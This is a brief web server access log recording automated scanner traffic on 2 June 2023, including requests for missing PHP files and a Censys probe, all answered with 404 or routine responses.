142.93.180.85 - - [02/Jun/2023:00:08:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
142.93.180.85 - - [02/Jun/2023:00:08:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.180.85 - - [02/Jun/2023:00:08:08 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.180.85 - - [02/Jun/2023:00:08:08 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
142.93.180.85 - - [02/Jun/2023:00:08:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
142.93.180.85 - - [02/Jun/2023:00:08:09 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.180.85 - - [02/Jun/2023:00:08:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
142.93.180.85 - - [02/Jun/2023:00:08:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.180.85 - - [02/Jun/2023:00:08:09 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.180.85 - - [02/Jun/2023:00:08:10 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.146.59 - - [02/Jun/2023:00:12:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.59 - - [02/Jun/2023:00:12:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.59 - - [02/Jun/2023:00:12:27 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.59 - - [02/Jun/2023:00:12:27 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.47.61.47 - - [02/Jun/2023:00:19:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
